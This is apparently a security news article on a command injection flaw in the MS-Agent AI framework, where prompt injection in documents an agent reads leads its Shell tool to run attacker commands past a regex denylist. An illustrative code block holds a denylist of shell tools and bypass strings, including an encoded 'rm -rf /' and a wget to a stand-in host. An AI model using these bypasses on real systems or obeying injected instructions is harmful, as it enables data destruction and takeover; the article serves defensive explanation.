A vulnerability in an AI automation framework could allow attackers to take complete control of systems running the software.
Security researchers have identified a command injection flaw in the ModelScope MS-Agent framework that could enable remote code execution through crafted prompt input, exposing organizations that deploy AI agents with operating system access.
“The real issue here isn’t just input validation, it’s architectural. We are letting AI agents generate and execute arbitrary system commands and then trying to bolt on regex-based validation afterward. That is backwards,” said Ken Johnson, CTO of DryRun Security, in an email to eSecurityPlanet.
“The attack itself is almost embarrassingly simple. No credentials, no shell access. Just feed the agent something it reads — a document, a log, a prompt — with the right metacharacters,” said Yagub Rahimov, CEO of Polygraf AI, in an email to eSecurityPlanet.
He added, “It picks the Shell tool on its own. It builds the command. It runs [the command]. Full OS execution, API keys, persistence, lateral movement. The agent did exactly what it was designed to do.”
“As AI agents become orchestration layers across enterprise systems, security must evolve from one-dimensional data protection to multi-axis, workflow-aware governance,” said Gidi Cohen, CEO and co-founder of Bonfy.AI, in an email to eSecurityPlanet.
How the MS-Agent Vulnerability Works
MS-Agent is a lightweight framework designed to enable AI agents to autonomously perform tasks and interact with system tools.
By allowing agents to retrieve data, analyze content, and execute commands on the underlying operating system, the framework can automate workflows such as code analysis, document processing, and system administration.
Granting AI agents the ability to execute system-level commands also introduces security risks — particularly when those agents process untrusted or externally sourced data.
The vulnerability, tracked as CVE-2026-2256, stems from the framework’s Shell tool, which allows agents to execute operating system commands to complete tasks.
Researchers found that MS-Agent does not properly sanitize prompt-derived input before passing it to the shell execution layer.
As a result, malicious instructions embedded in external content — such as documents, code repositories, or other retrieved data — may be interpreted as legitimate commands and executed by the agent.
Root Cause: Input Validation Failure
At the core of the issue is the framework’s check_safe() validation function, which attempts to filter unsafe commands using a regular expression–based denylist.
This mechanism is intended to block dangerous commands or keywords before they are executed.
However, denylist-based filtering is considered unreliable because attackers can bypass it using techniques such as command obfuscation, encoding, or alternative shell syntax, allowing malicious input to evade detection.
In this case, specially crafted input can slip past the validation checks and reach the shell execution layer, allowing unauthorized commands to be executed by the agent.
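The failure mode described above can be sketched in a few lines. The following Python model is illustrative only — the pattern and command names are assumptions for demonstration, not the actual `check_safe()` implementation — but it shows why keyword-matching denylists are so easy to defeat:

```python
import re

# Hypothetical denylist modeled on the kind of check described in the
# article -- NOT the real MS-Agent check_safe() code.
DENYLIST = re.compile(r"\b(rm|curl|wget|nc|bash|sh)\b")

def check_safe(command: str) -> bool:
    """Return True if the command passes the naive denylist filter."""
    return DENYLIST.search(command) is None

# A blatantly malicious command is caught...
assert check_safe("rm -rf /") is False

# ...but trivial obfuscation slips past keyword matching:
bypasses = [
    "r''m -rf /",                         # quote splicing: r''m runs as rm
    "$(echo cm0gLXJmIC8= | base64 -d)",   # base64-encoded 'rm -rf /'
    "w\\get http://evil.example/x",       # backslash escape inside the word
]
for cmd in bypasses:
    assert check_safe(cmd) is True        # every bypass passes the filter
```

Each obfuscated string still executes as the blocked command once a real shell expands it, which is why researchers consider pattern-based denylists unreliable as a security boundary.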
Prompt Injection Enables Remote Code Execution
Researchers demonstrated that attackers can exploit this weakness through a technique known as prompt injection.
In a prompt injection attack, malicious instructions are hidden within otherwise normal-looking text that an AI agent is asked to process.
For example, an attacker could embed harmful shell commands inside a document or code snippet that the agent is instructed to analyze or summarize.
If those instructions bypass the denylist validation, the agent may forward them directly to the Shell tool, resulting in command execution on the host system.
Because the vulnerability can be exploited remotely and does not require authentication or user interaction, it poses a significant risk for organizations deploying AI agents with system-level access.
If successfully exploited, attackers could execute arbitrary operating system commands with the same privileges as the MS-Agent process.
This level of access could enable threat actors to exfiltrate sensitive data, modify or delete critical files, establish persistence mechanisms, or move laterally within enterprise networks.
At the time of publication, the vendor has not provided an official statement or released a patch addressing the vulnerability.
How Organizations Can Mitigate MS-Agent Risk
Until a vendor patch becomes available, organizations using MS-Agent should take steps to reduce potential exposure.
Because the vulnerability could allow malicious input to trigger operating system commands, organizations should focus on limiting the agent’s permissions, restricting access to system tools, and monitoring agent activity for unusual behavior.
- Run MS-Agent in isolated or sandboxed environments, such as containers or ephemeral execution environments, to limit the potential impact of a compromise.
- Enforce the principle of least privilege so the MS-Agent process operates with only the minimum permissions required.
- Restrict or disable the Shell tool when possible, or limit execution to a small set of explicitly approved commands.
- Validate and sanitize all external or retrieved content before it is processed by the agent to reduce the risk of prompt injection.
- Replace denylist-based filtering with strict allowlists that permit only predefined and approved commands.
- Implement network segmentation and continuous monitoring to detect suspicious commands, unusual agent behavior, or unauthorized network activity.
- Regularly test incident response plans and logging processes to ensure teams can quickly detect, investigate, and contain a compromise involving AI agents.
These steps help organizations reduce exposure and contain potential compromises involving AI-driven automation.
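The allowlist recommendation above can be sketched as follows. This is an illustrative Python example, not MS-Agent's API; the approved program set is a placeholder policy. The key design choice is tokenizing with `shlex` and executing with an argument list (no shell), so metacharacters are never interpreted:

```python
import shlex
import subprocess

# Placeholder policy for illustration -- tune per deployment.
ALLOWED_PROGRAMS = {"ls", "cat", "echo"}

def run_allowlisted(command: str) -> str:
    """Execute only commands whose program is explicitly approved."""
    argv = shlex.split(command)          # tokenize; no shell is invoked
    if not argv or argv[0] not in ALLOWED_PROGRAMS:
        raise PermissionError(f"program not on allowlist: {command!r}")
    # shell=False (the default for a list argv): metacharacters like
    # ; | $() are passed as literal arguments, never interpreted.
    result = subprocess.run(argv, capture_output=True, text=True, timeout=10)
    return result.stdout

# The injected "; rm -rf /" is reduced to harmless literal arguments:
print(run_allowlisted("echo report done; rm -rf /"))
```

Unlike the denylist approach, anything not explicitly approved fails closed, and even an approved program cannot be chained into a second command because no shell ever parses the string.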
AI Agents Expand the Enterprise Attack Surface
The vulnerability highlights a broader challenge as organizations increasingly deploy AI agents to automate operational tasks.
While these systems can streamline workflows and improve efficiency, granting them direct access to system tools and operating system commands also expands the attack surface.
As organizations work to reduce these risks, many are turning to zero trust solutions that limit system access and enforce strict verification for applications, users, and automated agents.
